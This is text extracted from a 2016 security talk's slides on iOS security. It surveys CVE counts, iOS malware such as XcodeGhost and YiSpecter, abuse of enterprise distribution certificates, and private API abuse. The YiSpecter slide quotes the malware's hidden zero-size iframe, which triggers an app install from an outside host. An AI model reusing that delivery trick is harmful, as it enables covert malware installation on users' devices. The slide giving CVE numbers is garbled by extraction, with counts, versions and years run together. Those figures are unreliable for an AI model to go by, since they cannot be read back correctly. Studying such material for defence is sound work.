Ios: Including Ordinary Security?
Total Page:16
File Type:pdf, Size:1020Kb
www.dinosec.com @ dinosec iOS: including Ordinary Security? Raúl Siles Founder & Senior Security Analyst [email protected] December 2, 2016 2016 © Dino Security S.L. All rights reserved. Todos los derechos reservados. "iOS is considered to be by many in the industry one of the most secure mobile platforms" .0.1 2016 © Dino Security S.L. www.dinosec.com 2 All rights reserved. Todos los derechos reservados. Outline • iOS State-of-the-Art • Malware • Developers • Lock Screen • Digital Certificates • Software Updates • Wi-Fi • Conclusions 2016 © Dino Security S.L. www.dinosec.com 3 All rights reserved. Todos los derechos reservados. iOS State-of-the-Art 2016 © Dino Security S.L. www.dinosec.com 4 All rights reserved. Todos los derechos reservados. Market Share: Mobile Devices Q2 2015: Android: 82.8% iOS: 13.9% WP: 2.6% BB: 0.3% Others: 0.4% Consolidated trend to exceed more than 300 Reference: http://www.idc.com/prodserv/smartphone-os-market-share.jsp million units by quarter (Qx): 1,3 billions (2014) 2016 © Dino Security S.L. www.dinosec.com 5 All rights reserved. Todos los derechos reservados. Security By (CVE) Numbers Official numbers: Official numbers: • iOS 6: 197 • iOS 8: 56 • iOS after 10 years… • iOS 7: 80 • iOS 8.1: 5 • iOS 7.1: 41 • iOS 8.1.1: 9 Official –numbers?2007: iPhone 2G (iOS• … 1) • iOS 8.1.2: - Official– numbers2008: iPhone 3G (iOS 2) • iOS 8.1.3: 34 • iOS 10: 7 • iOS 8.2: 6 • iOS• iOS 10.0.1: 10:– 2009: 1 49 iPhone 3GS (iOS 3) • iOS 8.3: 58 Official numbers: • iOS• iOS 10.0.2: 10.0.1: 0 1 • iOS 8.4: 33 • iOS 10.0.2:– 2010: 0 iPhone 4 (iOS 4) + iPad 1 • iOS 8.4.1: 71 • iOS 9: 101 • wOS 3: 1 • iOS 9.0.1: - • wOS 3:– 2011: 19 iPhone 4S (iOS 5) + iPad 2 iOS 8.x: 272 • iOS 9.0.2: 1 • iOS 9.1: 49 – 2012: iPhone 5 (iOS 6) + iPad 3 & 4 & mini • iOS 9.2: 50 Official numbers: • iOS 9.2.1: 13 – 2013: iPhone 5c & 5s (iOS 7) + iPad air & mini 2 • iOS 9.3: 39 • wOS 1.0.1: 13 • iOS 9.3.1: - • wOS– 2.0:2014: 39 iPhone 6 & 6+ (iOS 8) + iPad air 2 & mini 3 • iOS 9.3.2: 39 • wOS 2.0.1: 14 • iOS 9.3.3: 46 • wOS– 2.1:2015: 30 iPhone 6S & 6S+ (iOS 9) + iPad Pro 12,9" & mini• iOS 4 9.3.4: 1 • wOS 2.2:• Apple 34 Watch & Apple Pencil • iOS 9.3.5: 3 • wOS 2.2.1: 26 • wOS– 2.2.2:2016: 26 iPhone SE + iPad Pro 9.7" + iPhone 7 & 7+ (iOS iOS10) 9.x: 342 wOS x.y: 182 6 2016 © Dino Security S.L. www.dinosec.com 6 All rights reserved. Todos los derechos reservados. Malware? 2016 © Dino Security S.L. www.dinosec.com 7 All rights reserved. Todos los derechos reservados. "If it has no name, it does not exist!" How do we identify or classify malware families and specimens if there are no anti-virus (or anti-malware) solutions for iOS? – Malware (CME) – Vulnerabilities (CVE) 2016 © Dino Security S.L. www.dinosec.com 8 All rights reserved. Todos los derechos reservados. Recent iOS Malware Trends (1/2) • “No iOS Zone” (DoS) – Malicious SSL certificates (iOS < 8.3) (Apr'15) – https://www.skycure.com/blog/ios-shield-allows-dos-attacks-on-ios-devices/ – WiFiGate: https://www.skycure.com/blog/wifigate-how-mobile-carriers-expose-us-to-wi-fi-attacks/ • XARA: Unauthorized Cross-App Resource Access on MAC OS X and iOS (Jun'15) – https://drive.google.com/file/d/0BxxXk1d3yyuZOFlsdkNMSGswSGs/view?pli=1 – http://www.imore.com/depth-look-ios-os-x-xara-vulnerabilities • KeyRaider: iOS Malware Steals Over 225,000 Apple Accounts (Aug'15) – http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts- to-create-free-app-utopia/ (for jailbroken devices) • Masque attack(s)… – "Masque Attack: All Your iOS Apps Belong to Us" (Nov'14) • https://www.fireeye.com/blog/threat-research/2014/11/masque-attack-all-your-ios-apps-belong-to-us.html – Wirelurker (Nov'14): http://researchcenter.paloaltonetworks.com/2014/11/wirelurker-new-era-os-x-ios-malware/ – "iOS Masque Attack Revived: Bypassing Prompt for Trust and App URL Scheme Hijacking" (Feb'15) • https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html – "Three New Masque Attacks against iOS: Demolishing, Breaking and Hijacking" (Jun'15) • https://www.fireeye.com/blog/threat-research/2015/06/three_new_masqueatt.html 9 2016 © Dino Security S.L. www.dinosec.com 9 All rights reserved. Todos los derechos reservados. Recent iOS Malware Trends (2/2) • …More masque attack(s) – "iOS Masque Attack Weaponized: A Real World Look" (Aug'15) • https://www.fireeye.com/blog/threat-research/2015/08/ios_masque_attackwe.html • XcodeGhost (Sep'15 & Nov'15) – http://researchcenter.paloaltonetworks.com/2015/09/novel-malware-xcodeghost-modifies-xcode-infects-apple- ios-apps-and-hits-app-store/ – https://blog.lookout.com/blog/2015/09/20/xcodeghost/ – https://blog.lookout.com/blog/2015/09/21/xcodeghost-apps – https://blog.lookout.com/blog/2015/09/22/xcodeghost-detection/ – https://www.fireeye.com/blog/threat-research/2015/11/xcodeghost_s_a_new.html • ZergHelper: Pirated iOS App Store’s Client (…) Evaded Apple iOS Code Review (Feb'16) – http://researchcenter.paloaltonetworks.com/2016/02/pirated-ios-app-stores-client-successfully-evaded-apple- ios-code-review/ • AceDeceiver: iOS Trojan Exploiting Apple DRM Design Flaws (…) (Mar'16) – http://researchcenter.paloaltonetworks.com/2016/03/acedeceiver-first-ios-trojan-exploiting-apple-drm-design- flaws-to-infect-any-ios-device/ • Pegasus: (Aug'16) – https://citizenlab.org/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/ 10 2016 © Dino Security S.L. www.dinosec.com 10 All rights reserved. Todos los derechos reservados. iOS Malware • Distributing Apps Out of the App Store • Abusing Apple Private APIs 2016 © Dino Security S.L. www.dinosec.com 11 All rights reserved. Todos los derechos reservados. Distributing Apps Out of the App Store • Apple Developer Enterprise Program (vs. Apple Developer Program) – https://developer.apple.com/programs/enterprise/ ($299/year) • Provision iOS apps for internal corporate distribution (in-house) – Enterprise certs and profiles can "only" be used for internal distribution – Technically, they can be used to install any app on any device • Violating Apple's Developer Enterprise Program terms of service – Avoid Apple's App Store vetting process • And it allows the usage of Apple private APIs (sensitive operations) • User must accept the app installation (two taps) – In iOS 9 it is required to manually trust the developer (provisioning profile) http://johannesluderschmidt.de/provision-ios-ipa-app-for-in-house-enterprise-distribution/ 2016 © Dino Security S.L. www.dinosec.com 12 All rights reserved. Todos los derechos reservados. "Two taps to rule them all" 2016 © Dino Security S.L. www.dinosec.com 13 All rights reserved. Todos los derechos reservados. Apple Developer Enterprise Distribution Requirements • Become an Apple enterprise "developer": $299/year • Generate a certificate to distribute iOS apps • Create a provisioning profile • Create the iOS app IPA file & associated Manifest file (PLIST) • Create an "itms-services" web link pointing to the Manifest – The Manifest file includes the reference to the IPA file (app) • Own a web server with a valid trusted certificate (HTTPS) • Distribute the web link: E.g. Tweet, web page, e-mail, Google dork, etc. – Real benign distribution cases in Spain and China <a href="itms-services://?action=download-manifest&url=https:// www.dinosec.com/dist/app/manifest.plist">Install this app!</a> 2016 © Dino Security S.L. www.dinosec.com 14 All rights reserved. Todos los derechos reservados. Distributing Apps Out of the App Store: iOS 8 & 9+ 2016 © Dino Security S.L. www.dinosec.com 15 All rights reserved. Todos los derechos reservados. Abusing Apple Private APIs (1/2) • Objective-C – Message dispatch mechanism to invoke method/function calls – objc_msgSend (String parameters) • Class name and method name • Not resolved statically, but at runtime (or execution time) – Obfuscated and/or encrypted – Load a library (dlopen) and access a function (dlsym) • Runtime (or NSClassFromString / NSSelectorFromString) • Apple's App Store review or vetting process – Private APIs accessing sensitive user information 2016 © Dino Security S.L. www.dinosec.com 16 All rights reserved. Todos los derechos reservados. Abusing Apple Private APIs (2/2) • "iRiS: Vetting Private API Abuse in iOS Applications" (Oct 2015) – Dynamic analysis of API calls that cannot be resolved statically ("suspicious") – 2,019 apps analyzed: 146 (7%) make use of 150 private APIs (25 critical) • SourceDNA (Oct 2015) – Using the methods described in the previous slide… – 256 apps affected (+1 million downloads) – Youmi's Ad SDK (obfuscated binary ad library) • It sends user info to a server in China – List of installed apps, current running being, serial number, hardware components (peripherals), "e-mail" Apple ID… http://www.cse.buffalo.edu/~mohaisen/classes/fall2015/cse709/docs/deng-ccs15.pdf https://sourcedna.com/blog/20151018/ios-apps-using-private-apis.html 2016 © Dino Security S.L. www.dinosec.com 17 All rights reserved. Todos los derechos reservados. YiSpecter (Oct 5, 2015) • Distributed through an Apple Enterprise Developer certificate – Evades Apple's App Store vetting process – Targets both jailbroken and non-jailbroken iOS devices <iframe src="itms-services://?action=download-manifest& url=https:// qvod.bb800.com/assets/upload/3794.plist" height=0 width=0></frame> • Extensive usage of private APIs – MobileInstallation: local app (.ipa file) install & uninstall capabilities – Claims a private entitlement key used by iOS system apps • com.apple.private.mobileinstall.allowedSPI – Monitor currently open app and displays advertisements • SpringBoardServices: SBSCopyFrontmostApplicationDisplayIdentifier • SpringBoardServices: SBSLaunchApplicationWithIdentifier – Obtains the list of installed apps: MobileInstallationLookup – Mobile Safari manipulation: default search engine, bookmarks, etc.